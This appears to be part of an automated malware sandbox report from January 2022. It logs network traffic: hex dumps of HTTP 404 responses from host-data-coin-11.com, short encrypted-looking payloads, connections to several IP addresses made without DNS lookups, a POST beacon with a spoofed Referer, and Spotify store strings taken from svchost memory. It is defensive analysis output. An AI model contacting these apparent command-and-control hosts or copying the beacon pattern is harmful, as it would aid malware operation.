74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4c 47 bb 29 c4 b0 66 d3 2f 41 0b ac b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OTevLG)f/AW0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000018.00000003.408440029.000001C13D39D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.408469894.000001C13D3AE000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","
LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cosjvii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49919 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49927 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
